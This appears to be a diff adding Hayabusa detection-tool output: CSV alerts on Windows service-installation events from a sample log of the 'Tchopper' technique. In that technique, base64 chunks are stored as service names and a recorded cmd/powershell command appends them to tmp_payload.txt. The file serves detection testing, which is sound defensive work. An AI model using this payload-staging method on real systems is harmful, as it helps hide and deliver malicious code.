+2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:54.170 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:54.170 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:54.170 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:01.428 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:01.428 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
